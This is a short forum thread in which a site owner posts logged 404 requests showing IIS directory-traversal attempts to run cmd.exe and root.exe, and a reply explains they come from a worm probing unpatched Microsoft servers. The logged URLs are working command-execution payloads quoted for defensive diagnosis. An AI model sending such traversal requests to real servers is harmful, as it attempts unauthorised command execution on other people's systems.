Forum Moderators: phranque
/scripts/..Áœ../winnt/ system32/cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c/ ..Á ../..Á ../..Á ../winnt/ system32/cmd.exe?/c+dir
/_mem_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe?/c+ dir
/_vti_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe?/c+ dir
/d/winnt/system32/cmd.exe?/c+ dir
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
Is this someone trying to gain access to my system? What do they think they will see?
Jaeden
It is not any individual trying to hack your system. It looks like some variety of the "Code Red" worm, which infects and spreads from Microsoft IIS servers
that haven't been properly patched.
The giveaway is the repeated snip of code:
winnt/system32/cmd.exe?/
The worm is trying to copy the standard Windows NT/2000 command interpreter "cmd.exe" into the server's "scripts" directory, so it can execute commands on the site.
If your site is not on a Microsoft server you are probably safe. Also, Microsoft offered a patch for this months ago. I would be extremely surprised if your host had this hole and hasn't patched it yet, but it wouldn't hurt to ask them about it.
As for the 404 codes --the fact that you found the record of it under 404 means your server returned a "not found" message. IOW the worm was not getting what it wanted --a good thing!
Thanks for the info.
